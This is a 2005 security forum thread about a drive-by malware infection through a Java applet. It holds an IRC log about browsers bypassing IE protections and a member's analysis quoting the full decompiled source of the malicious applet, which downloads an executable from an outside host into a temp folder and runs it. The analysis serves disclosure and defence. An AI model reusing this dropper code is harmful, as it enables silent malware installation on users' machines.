 Theory |
Welcome! Register for a free account (or login) > How does it work?
|
|
 Mar 4 2005, 10:10 AM
Post
#1
|
|
 AntiSlyware.com  Group: Malware Expert Posts: 984 Joined: 10-May 03 From: Great Country Of Texas Member No.: 5 Operating System: ...  |
If you want to point someone at this post:
http://TomCoyote.org/Theory/ that link will bring you to here My appologies if anyone takes anything said against thier browser, their surfing, their computer, their dogs or their cats, this is just a conversation that needs to be thought about [ 09:39:25 ] [ @Efwis ] I had fun teh other night, was surfing the web for a neildiamond song, got nailed with a major hijacking [ 09:39:33 ] [ @Efwis ] *Neil Diamond [ 09:39:43 ] [ @Coyote` ] neil will do that to you [ 09:39:54 ] [ @Coyote` ] go with Pink Floyd next time [ 09:40:45 ] [ @Efwis ] heh, hit me with 180solutions, l2m, 10 viruses 2 trojan downloaders, a java exploit, and a hompage hijack, went right around Moz and nailed IE [ 09:40:46 ] [ @Coyote` ] it's a crying shame that no one is safe looking for things nowadays [ 09:41:12 ] [ @Efwis ] oh I forgot ISTVbar and sidesearch [ 09:41:41 ] [ @Coyote` ] let's say you have IE secure, and you use another browser [ 09:42:31 ] [ @Coyote` ] this other browser allows something to happen that bypasses the first block you have built into IE say Iespyads, thus IE is now a target again through this other browser [ 09:42:44 ] [ @Coyote` ] this IS just a theory btw [ 09:42:51 ] [ @Coyote` ] but it is possible [ 09:43:31 ] [ @Coyote` ] now if you go to that same site in IE, nothing happens because your first block stopped it [ 09:43:45 ] [ @Efwis ] i'm looked in my IE_Spyad files, this page isn't even listed, although it should be, I think i will contact Eric Howes adn he can add it to his next update [ 09:44:11 ] [ @Coyote` ] are you in the classroom? [ 09:44:18 ] [ @Efwis ] yeah, your theory has merit adn is probably quite accurate [ 09:44:22 ] [ @Efwis ] yes I am [ 09:44:32 ] [ @Coyote` ] have you been keeping up with wng_z3r0's problem that I have posted to? [ 09:44:45 ] [ @Efwis ] no, got a link? [ 09:44:53 ] [ @Coyote` ] http://forums.tomcoyote.org/index.php?act=...ndpost&p=137765 [ 09:45:08 ] [ @Coyote` ] took 4 pages of posts to finally get to the root of the problem [ 09:45:26 ] [ @Efwis ] looking [ 09:45:41 ] [ @Coyote` ] his shell browser covering IE allowed something IE wouldn't [ 09:46:31 ] [ @Coyote` ] not so much a theory anymore [ 09:48:00 ] [ @bozodog ] are you saying that Mozilla can let stuff through to IE and beyond? [ 09:48:50 ] [ @Coyote` ] I am not saying anything about moz, I am saying it is a possibility that an alternate browser can let things bypass to IE and therefore cause problems [ 09:49:44 ] [ @Coyote` ] and by them bypassing to IE, IE's protections can be bypassed that normally wouldn't if IE was in use instead of the alternate [ 09:50:29 ] [ @bozodog ] err.. I think I understand [ 09:51:01 ] [ @Coyote` ] it's like a layer effect, you have layers of protections you set in place, using an alternate browser, you can possibly bypass a layer or two which in turn can lead to your being infected [ 09:51:36 ] [ @Coyote` ] it may not go in the front door but it might find a side window [ 09:51:37 ] [ @bozodog ] Ahh.. [ 09:52:45 ] [ @Coyote` ] I won't say that it is possible with any particular browser, I think in fact it may be possible with any browser [ 09:53:03 ] [ @Coyote` ] but this is only theory at this point [ 09:53:24 ] [ @Coyote` ] some script kiddie will strive to make it happen on a regular basis eventually [ 09:54:10 ] [ @bozodog ] sounds like a solid thought... they are getting better at mucking up our systems.. [ 09:54:36 ] [ @Coyote` ] well, the problem itself goes back to windows, [ 09:54:53 ] [ @Coyote` ] windows is made to accomodate users of limited knowledge [ 09:55:06 ] [ @bozodog ] but doesn't your AV, etc... do it's job in that case? [ 09:55:09 ] [ @Coyote` ] so that in itself is preyed upon by the kiddies [ 09:55:36 ] [ @Coyote` ] AV is only one part of an overall solution and it lacks a great deal of the overall protection [ 09:56:07 ] [ @Coyote` ] the AV chosen also plays a part in how that is defined [ 09:56:42 ] [ @Coyote` ] several AV's have weak real time scanning engines that fail at the sight of any infection [ 09:57:15 ] [ @Coyote` ] real time scanning engines are the only way to truly combat virus and trojans [ 09:57:28 ] [ @bozodog ] I only use Avast free... and spywareblaster etc.. [ 09:57:42 ] [ @Coyote` ] I have not tried Avast [ 09:57:51 ] [ @Coyote` ] so I cannot comment on it [ 09:58:27 ] [ @bozodog ] it sure updates often, (2-3 times a day at times) [ 09:58:51 ] [ @Coyote` ] I hope that is because they are adding to the database and not correcting mistakes [ 09:58:58 ] [ @bozodog ] and scares the heck outa me when some baddie trys to get in [ 09:59:15 ] [ @bozodog ] yeah, it's data [ 09:59:34 ] [ @Coyote` ] well, you can't tell from the updating [ 09:59:53 ] [ @Coyote` ] you would have to disect each dataflow [ 10:00:03 ] [ @Coyote` ] and know what coding they use [ 10:00:51 ] [ @Efwis ] from looking at that post, i wouold say you are correct Tom, no longer a theory but a proven fact [ 10:01:15 ] [ @bozodog ] of course I don't surf the back alleys, or p2p stuff [ 10:01:24 ] [ @Coyote` ] well, fact for his situation, theory for other browsers at this point [ 10:01:52 ] [ @Coyote` ] bozodog look at what happened to Efwis looking for a neil diamond song [ 10:01:59 ] [ @Efwis ] based on what happened to me its a fact for Moz too [ 10:02:01 ] [ @bozodog ] yep [ 10:02:30 ] [ @bozodog ] do you use Moz of FF? [ 10:02:31 ] [ @Coyote` ] I hate it when I am correct about some of these theories but I am right too many times [ 10:02:48 ] [ @Efwis ] i went there with my IE yesterday, nothing happened, all my protections worked correctly [ 10:03:13 ] [ @bozodog ] you're like a hound dog.. you can sniff out problems [ 10:03:13 ] [ @Efwis ] so I am inclined to believe it is something actually programmed into the html code [ 10:03:40 ] [ @Efwis ] he is good at what he does, and I like his info, because he usually is correct bd [ 10:04:23 ] [ @bozodog ] don't I know it... he knows I have the highest respect for what he says |
 |
 
|
|
Replies
|
Mar 14 2005, 11:43 AM
Post
#2
|
||
|
New Member  Group: Authentic Member Posts: 10 Joined: 14-March 05 Member No.: 27,723 Operating System: several, WinME, XP, SuSE, Eros |
QUOTE("Mike") And I'd like to point out that Java did just what it is designed to do when an applet attempts to bypass the security sandboxing, it popped a very plainly worded security warning that the applet is using an unverified certificate from an untrusted company. Here is certificate warning, courtesy of another user from another board:  Now, nothing in that certificate says that the applet wishes to download a PE file (native executable binary) into the Windows temporary directory and then execute it. So I would respectfully disagree that the average user (98% of them) would worry much about this particular warning. For the simple reason that, most people who have any concept of what Java is, have also assimilated the common, if erroneous, notion that Java applets only run inside of a "security sandbox". I personally believe that people really shouldn't have to worry about whether a piece of Java code has been signed or not when such code is executed from the context of a browser. Now, if someone wants to download a Java applet and start it up from the command line, and wish to grant it complete authority to trash their system, that's their prerogative. But unless the Firefox team wants Java to get the same evil reputation as ActiveX, they should work with Sun to figure out how to constrain Java calls to File.createTempFile() and Runtime.exec() and provide users with a default false setting to new options in about:config, for example "java.allow.runtime.exec" and "java.allow.file.createtempfile". This would "solve" the problem for 98% of the user community. Thanks Paperghost for finding my little post in the blizzard of comments on your site. Had you not posted about the exploit, I wouldn't have read about it on theregister.co.uk Here is the rest of the decompiled jar file. Please notice that all of the malware installation is done by the PE executable that the Java applet downloads and runs, and is not done directly by the Java applet itself. Please also note that the downloaded PE file could have been any sort of payload (virus, worm, trojan, rootkit, whatever), and thus offers a vector against Firefox itself. Cheers. CODE // Decompiled by "rob" // Source File Name: InstallerApplet.java package javainstaller; import java.applet.Applet; import java.awt.*; import java.io.*; import java.net.*; public class InstallerApplet extends Applet { public String getParameter(String s, String s1) { return isStandalone ? System.getProperty(s, s1) : getParameter(s) == null ? s1 : getParameter(s); } public ByteArrayOutputStream downloadFile(String s) throws IOException { URL url1 = new URL(s); InputStream inputstream = url1.openStream(); if(inputstream == null) throw new IOException("the stream of the connection was null"); byte abyte0[] = new byte[26384]; ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(); for(int i = 0; i != -1;) { i = inputstream.read(abyte0, 0, 26384); if(i != -1) bytearrayoutputstream.write(abyte0, 0, i); } if(inputstream != null) inputstream.close(); return bytearrayoutputstream; } public String saveFile(ByteArrayOutputStream bytearrayoutputstream, File file) throws IOException { FileOutputStream fileoutputstream = new FileOutputStream(file); fileoutputstream.write(bytearrayoutputstream.toByteArray()); if(fileoutputstream != null) fileoutputstream.close(); return file.getAbsolutePath(); } public InstallerApplet() { isStandalone = false; url = "http://www.slotch.com/ist/softwares/v4.0/istdownload.exe"; app = "iinstall"; vmcZV9HHQsT = "bk5CaeGOco7CU7rSfX7U2LxsptOacuqwyEaNRfRVle7M8NYegXGftdPyBrGAbdGNJ8RCac"; vGDI5wuEjJQxI = "9G7ftFBBGpnnwP1v4BWeyp"; vDjMcU3yvG = "lx1E039A5SF7OnBOGOdWT4gOJ52kfceX59iGRAQPxCK4GSEWEbv"; } public void init() { try { account_id = getParameter("account_id", ""); download_key = getParameter("download_key", ""); download_lock = getParameter("download_lock", ""); cfg = getParameter("cfg", ""); sub = getParameter("sub", ""); } catch(Exception exception) { exception.printStackTrace(); } try { jbInit(); } catch(Exception exception1) { exception1.printStackTrace(); } } private void jbInit() throws Exception { File file = File.createTempFile(app, ".exe"); ByteArrayOutputStream bytearrayoutputstream = downloadFile(url); if(bytearrayoutputstream == null) throw new IOException("downloading was failed"); String s = saveFile(bytearrayoutputstream, file); bytearrayoutputstream.close(); String s1 = ""; if(account_id != null && account_id.length() > 0) s1 = s1 + " /aid:" + account_id; if(download_key != null && download_key.length() > 0) s1 = s1 + " /key:" + download_key; if(download_lock != null && download_lock.length() > 0) s1 = s1 + " /lock:" + download_lock; if(cfg != null && cfg.length() > 0) s1 = s1 + " /cfg:" + cfg; if(sub != null && sub.length() > 0) s1 = s1 + " /sub:" + sub; Runtime.getRuntime().exec(file.getAbsolutePath() + s1); } public String getAppletInfo() { return "Applet Information"; } public String[][] getParameterInfo() { String as[][] = { { "param1", "String", "" }, { "download_key", "String", "" }, { "download_lock", "String", "" } }; return as; } public static void downloadApp(String s, File file) { label0: { Object obj = null; if(s == null) break label0; HttpURLConnection httpurlconnection = null; try { try { URL url1 = new URL(s); httpurlconnection = (HttpURLConnection)url1.openConnection(); httpurlconnection.setRequestMethod("POST"); httpurlconnection.setDoInput(true); httpurlconnection.setDoOutput(true); httpurlconnection.setUseCaches(false); httpurlconnection.setAllowUserInteraction(true); HttpURLConnection.setFollowRedirects(true); httpurlconnection.setInstanceFollowRedirects(true); InputStream inputstream = null; FileOutputStream fileoutputstream = null; try { inputstream = httpurlconnection.getInputStream(); fileoutputstream = new FileOutputStream(file); byte abyte0[] = new byte[1000]; try { while(inputstream.read(abyte0) > 0) fileoutputstream.write(abyte0); } catch(IOException ioexception2) { System.err.println(ioexception2); } } catch(IOException ioexception1) { } finally { if(fileoutputstream != null) fileoutputstream.close(); if(inputstream != null) inputstream.close(); } } catch(MalformedURLException malformedurlexception) { System.out.print("The URL was malformed: " + malformedurlexception.getMessage()); break label0; } catch(IOException ioexception) { System.out.print("The URL caused an IO Exception: " + ioexception.getMessage()); break label0; } break label0; } finally { if(httpurlconnection != null) httpurlconnection.disconnect(); } } } public static void main(String args[]) { InstallerApplet installerapplet = new InstallerApplet(); installerapplet.isStandalone = true; Frame frame = new Frame(); frame.setTitle("Applet Frame"); frame.add(installerapplet, "Center"); installerapplet.init(); installerapplet.start(); frame.setSize(1, 1); Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize(); frame.setLocation((dimension.width - frame.getSize().width) / 2, (dimension.height - frame.getSize().height) / 2); frame.setVisible(true); } private boolean isStandalone; public static final int BUFFER_SIZE = 26384; String url; String app; String account_id; String download_key; String download_lock; String cfg; String sub; String vmcZV9HHQsT; String vGDI5wuEjJQxI; String vDjMcU3yvG; } This post has been edited by rob_: Mar 14 2005, 11:47 AM
Attached thumbnail(s)
|
|
|
|
|
|
Posts in this topic
Coyote Theory Mar 4 2005, 10:10 AM
Efwis The below log was genrated from a machine that wen... Mar 4 2005, 06:18 PM shelf life Efwis, can you post a link to the website Mar 4 2005, 08:21 PM wng_z3r0 if such a theory were true, is there a way to ... Mar 5 2005, 01:57 AM Coyote this go over your head?
the problem is not IE, if... Mar 5 2005, 04:58 AM
wng_z3r0 QUOTE(Coyote @ Mar 5 2005, 04:58 AM)
IE is i... Mar 5 2005, 10:13 AM Efwis QUOTE(shelf life @ Mar 4 2005, 08:21 PM)Efwis... Mar 5 2005, 06:45 AM harpwolf QUOTE(Efwis @ Mar 5 2005, 05:45 AM)QUOTE(shel... Mar 13 2005, 04:09 PM ChrisRLG Efwis
Has Jeff got his computer clean now - (Its ... Mar 5 2005, 10:10 AM Besttechie Hey Everyone,
As you can see from the log Efwis p... Mar 5 2005, 10:37 AM insipid QUOTE(Besttechie @ Mar 5 2005, 08:37 AM) Now,... Mar 5 2005, 11:15 AM Coyote It is always your choice as to what to use, I have... Mar 5 2005, 01:05 PM Coyote This is a js file that was called to from the link... Mar 5 2005, 07:39 PM herbalist Efwis,
Do you happen to know which version of Fire... Mar 6 2005, 04:34 AM helpless I can say at work using other browsers then MSIE i... Mar 6 2005, 05:42 AM Efwis QUOTE(herbalist @ Mar 6 2005, 04:34 AM)Efwis,... Mar 6 2005, 08:06 AM Racktracker Efwis was "kind" enough to send me the l... Mar 6 2005, 11:19 AM Crow hmm.... my log after visiting with FF
Logfile... Mar 6 2005, 12:37 PM dknoppix All that I'm hoping is that there isn't an... Mar 6 2005, 07:42 PM RubbeR DuckY Me thinks they were planning this. Yes, funny adve... Mar 7 2005, 05:30 PM Paperghost Theyre doing this by exploiting the Sun java runti... Mar 9 2005, 06:37 PM Paperghost I've had an update from Daniel Veditz, head of... Mar 10 2005, 12:09 AM Coyote Paperghost thank you for your work on this Mar 10 2005, 12:19 AM Pipex have highlighted the unfortunate news on my forum ... Mar 10 2005, 02:10 AM LostAccount Just did a google search on the site.
Found it...b... Mar 10 2005, 11:20 AM Hound5150 I have not been able to test much of this but if y... Mar 10 2005, 11:21 AM Paperghost http://www.theregister.co.uk/2005/03/11/al...tive_... Mar 11 2005, 11:40 AM Hound5150 This was a thought that I had after reading an art... Mar 11 2005, 01:27 PM grummy After reading this thread I couldn't resist go... Mar 11 2005, 07:22 PM Racktracker If you look at my screen shot you can see the ... Mar 11 2005, 08:23 PM grummy RackTracker, I now see that both our browsers reac... Mar 11 2005, 08:40 PM grummy I just looked in Contol Panel and opened the up Ja... Mar 11 2005, 09:00 PM Paperghost Some people have said that this only affects older... Mar 12 2005, 05:36 AM Paperghost Funnily enough, "Java/JavaOpenStream" ha... Mar 12 2005, 06:11 AM Mike Guys, this is not a browser problem. This is a Jav... Mar 12 2005, 02:07 PM Paperghost Actually, it IS a browser problem in that the brow... Mar 12 2005, 03:47 PM mpfeif101 Check out Mike's newsletter... well said:
htt... Mar 13 2005, 10:59 AM Paperghost QUOTEMy frustration with this is that people are c... Mar 13 2005, 11:25 AM Racktracker If people were being infected without warning via ... Mar 13 2005, 01:15 PM Efwis I should point out, and this by no means goes agai... Mar 13 2005, 01:18 PM Racktracker I'm not sure of the circumstances in Efwis... Mar 13 2005, 02:33 PM southernlady I was reading paperghost's site and then went ... Mar 13 2005, 09:12 PM EVApilot You'll be glad to know that the applets fail o... Mar 14 2005, 10:41 AM The Computer Valet QUOTE(rob_ @ Mar 14 2005, 12:43 PM)So I would... Mar 14 2005, 09:16 PM Paperghost Excellent post, Rob Mar 14 2005, 01:24 PM Avohir you know... it strikes me that if this is an explo... Mar 14 2005, 01:54 PM rob_ slotch.com, is the the canadian firm sending this ... Mar 14 2005, 01:59 PM Efwis actually harpwolf works for Yahoo, contacted me by... Mar 14 2005, 02:22 PM rob_ Ah, good to know. If I had permission to edit my ... Mar 14 2005, 03:15 PM Efwis ask and ye shall recieve, you want it edited rob? Mar 14 2005, 03:16 PM rob_ Aye that would be great. Thanks. Mar 14 2005, 03:20 PM rob_ Here are a couple more choice quotations from Inte... Mar 14 2005, 04:47 PM Paperghost Thats....a very good question Rob. Now im REALLY g... Mar 14 2005, 05:03 PM rob_ QUOTE(The Computer Valet)You can call these people... Mar 15 2005, 09:14 AM southernlady QUOTEthe bulk of the Firefox user base shouldn... Mar 15 2005, 10:05 AM rob_ QUOTE(southernlady)That actually should read ANY u... Mar 15 2005, 11:39 AM southernlady QUOTEIE doesn't interest me because I don... Mar 16 2005, 07:07 AM rob_ QUOTEif you use a Windows product, you use IE even... Mar 16 2005, 05:25 PM The Computer Valet QUOTE(rob_ @ Mar 16 2005, 06:25 PM)Anyway, I ... Mar 16 2005, 09:35 PM aad As a newbie to this forum but not a newbie to secu... Mar 17 2005, 01:19 AM rob_ QUOTETo wit: You MUST click YES to continue.
To w... Mar 17 2005, 09:41 AM Blacksheep Hmm after perusing the various posts, rants, ruffl... Mar 17 2005, 10:21 AM Zero QUOTE(Blacksheep @ Mar 17 2005, 12:21 PM)2. I... Mar 17 2005, 03:28 PM aad QUOTE(Zero @ Mar 17 2005, 09:28 PM)QUOTE(Blac... Mar 17 2005, 03:57 PM Zero Funny. I dont recall saying anything about Linux, ... Mar 17 2005, 04:07 PM Blacksheep Many newbies are unaware of the consequences of cl... Mar 17 2005, 06:28 PM Galadriel Whether it works on Linux or not, has nothing to d... Mar 17 2005, 06:52 PM rob_ @ ZERO
LOL Well, you will all be relieved for thi... Mar 17 2005, 07:00 PM Zero I stand by what I said. If a user fails to see tha... Mar 17 2005, 07:08 PM Paperghost "I stand by what I said. If a user fails to s... Mar 18 2005, 12:28 AM Zero Alright, done, demoted.
Now as per your post:
Ge... Mar 18 2005, 01:24 AM Paperghost QUOTE"Nowhere in the applet does it say anyth... Mar 18 2005, 01:40 AM Zero “Your insistence on saying this "isnt" a... Mar 18 2005, 01:51 AM Efwis QUOTEIts not an exploit, it never was an exploit, ... Mar 18 2005, 07:28 AM Zero "2 : to make use of meanly or unjustly for on... Mar 18 2005, 10:40 AM Paperghost QUOTE(Zero @ Mar 18 2005, 07:51 AM)Kevin Mitn... Mar 18 2005, 12:23 PM aad I will add that the exploit WOULD work on Linux. T... Mar 18 2005, 12:29 PM Avohir I wouldn't touch this debate with a 10 foot po... Mar 18 2005, 12:30 PM Zero "...and that proves the validity of your argu... Mar 18 2005, 01:15 PM Paperghost
...which proves you can't possibly work (in ... Mar 18 2005, 02:04 PM Zero "...which proves you can't possibly work ... Mar 18 2005, 02:30 PM Paperghost "There is a difference between WINE and LINUX... Mar 18 2005, 02:42 PM Zero "Which doesnt really make your point any clea... Mar 18 2005, 02:56 PM Paperghost QUOTEZero: Yes. I ran the exploit under linux noth... Mar 18 2005, 03:17 PM Zero "And yet in the above statement you are defin... Mar 18 2005, 04:23 PM aad PaperGhost: Yes, I have to totally agree. I still... Mar 18 2005, 04:35 PM Paperghost An interesting find re proxies...havent tested tha... Mar 18 2005, 04:39 PM aad QUOTE(Paperghost @ Mar 18 2005, 10:39 PM)An i... Mar 18 2005, 05:23 PM Paperghost One small thing that everybody is missing on this ... Mar 19 2005, 01:03 PM Avohir correct me if I'm wrong here... but unless you... Mar 19 2005, 03:43 PM Zero News flash: visting sites stores files in your cac... Mar 19 2005, 05:45 PM Paperghost Zero, once again you've missed the point compl... Mar 20 2005, 04:22 AM southernlady QUOTEAfter all, I'm willing to bet theres a sl... Mar 20 2005, 07:31 AM Paperghost QUOTE(southernlady @ Mar 20 2005, 01:31 PM)An... Mar 20 2005, 09:06 AM nlinecomputers This has had so many responses in the past few day... Mar 20 2005, 10:57 AM Zero "Zero, once again you've missed the point... Mar 20 2005, 11:25 AM Paperghost Zero, if you're happy to leave crud - any crud... Mar 20 2005, 02:36 PM Zero And that's why every PC I fix I give them a co... Mar 20 2005, 02:44 PM Siggyx Play nice everyone. Mar 20 2005, 02:48 PM |
|
Time is now: 12th March 2010 - 06:47 PM |
Member site: Alliance of Security Analysis Professionals | UNITE Against Malware
Memory Forums | Auto Repair Forum
© Geeks to Go, Inc. | All Rights Reserved | Privacy Policy
